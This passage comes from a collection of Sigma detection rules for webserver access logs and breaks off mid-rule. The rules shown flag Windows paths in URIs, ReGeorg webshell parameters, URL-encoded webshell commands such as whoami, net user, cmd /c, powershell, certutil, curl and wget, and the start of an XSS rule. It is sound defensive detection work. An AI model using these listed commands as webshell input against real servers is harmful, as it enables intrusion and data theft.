- 'GIS - AppSec Team - Project Vision'
condition: selection
falsepositives:
- Unknown
level: medium
================================================
FILE: rules/web/webserver_generic/web_susp_windows_path_uri.yml
================================================
title: Suspicious Windows Strings In URI
id: 9f6a34b4-2688-4eb7-a7f5-e39fef573d0e
status: test
description: Detects suspicious Windows strings in URI which could indicate possible exfiltration or webshell communication
references:
- https://thedfirreport.com/2022/06/06/will-the-real-msiexec-please-stand-up-exploit-leads-to-data-exfiltration/
author: Nasreddine Bencherchali (Nextron Systems)
date: 2022-06-06
modified: 2023-01-02
tags:
- attack.persistence
- attack.exfiltration
- attack.t1505.003
logsource:
category: webserver
detection:
selection:
cs-uri-query|contains:
- '=C:/Users'
- '=C:/Program%20Files'
- '=C:/Windows'
- '=C%3A%5CUsers'
- '=C%3A%5CProgram%20Files'
- '=C%3A%5CWindows'
condition: selection
falsepositives:
- Legitimate application and websites that use windows paths in their URL
level: high
================================================
FILE: rules/web/webserver_generic/web_webshell_regeorg.yml
================================================
title: Webshell ReGeorg Detection Via Web Logs
id: 2ea44a60-cfda-11ea-87d0-0242ac130003
status: test
description: Certain strings in the uri_query field when combined with null referer and null user agent can indicate activity associated with the webshell ReGeorg.
references:
- https://community.rsa.com/community/products/netwitness/blog/2019/02/19/web-shells-and-netwitness-part-3
- https://github.com/sensepost/reGeorg
author: Cian Heasley
date: 2020-08-04
modified: 2023-01-02
tags:
- attack.persistence
- attack.t1505.003
logsource:
category: webserver
detection:
selection:
cs-uri-query|contains:
- 'cmd=read'
- 'connect&target'
- 'cmd=connect'
- 'cmd=disconnect'
- 'cmd=forward'
filter:
cs-referer: null
cs-user-agent: null
cs-method: POST
condition: selection and filter
falsepositives:
- Web applications that use the same URL parameters as ReGeorg
level: high
================================================
FILE: rules/web/webserver_generic/web_win_webshells_in_access_logs.yml
================================================
title: Windows Webshell Strings
id: 7ff9db12-1b94-4a79-ba68-a2402c5d6729
status: test
description: Detects common commands used in Windows webshells
references:
- https://bad-jubies.github.io/RCE-NOW-WHAT/
- https://m365internals.com/2022/10/07/hunting-in-on-premises-exchange-server-logs/
author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
date: 2017-02-19
modified: 2022-11-18
tags:
- attack.persistence
- attack.t1505.003
logsource:
category: webserver
detection:
selection_method:
cs-method: 'GET'
selection_keywords:
# The "%20" is URL encoded version of the space
# The "%2B" is URL encoded version of the "+"
- '=whoami'
- '=net%20user'
- '=net+user'
- '=net%2Buser'
- '=cmd%20/c%'
- '=cmd+/c+'
- '=cmd%2B/c%'
- '=cmd%20/r%'
- '=cmd+/r+'
- '=cmd%2B/r%'
- '=cmd%20/k%'
- '=cmd+/k+'
- '=cmd%2B/k%'
- '=powershell%'
- '=powershell+'
- '=tasklist%'
- '=tasklist+'
- '=wmic%'
- '=wmic+'
- '=ssh%'
- '=ssh+'
- '=python%'
- '=python+'
- '=python3%'
- '=python3+'
- '=ipconfig'
- '=wget%'
- '=wget+'
- '=curl%'
- '=curl+'
- '=certutil'
- '=copy%20%5C%5C'
- '=dsquery%'
- '=dsquery+'
- '=nltest%'
- '=nltest+'
condition: all of selection_*
falsepositives:
- Web sites like wikis with articles on os commands and pages that include the os commands in the URLs
- User searches in search boxes of the respective website
level: high
================================================
FILE: rules/web/webserver_generic/web_xss_in_access_logs.yml
================================================
title: Cross Site Scripting Strings
id: 65354b83-a2ea-4ea6-8414-3ab38be0d409
status: test
description: Detects XSS attempts injected via GET requests in access logs
references:
- https://github.com/payloadbox/xss-payload-list
- https://portswigger.net/web-security/cross-site-scripting/contexts
author: Saw Win Naung, Nasreddine Bencherchali
date: 2021-08-15
modified: 2022-06-14
tags:
- attack.initial-access
- attack.t1189
logsource:
category: webserver
detection:
select_method:
cs-method: 'GET'
keywords:
- '=
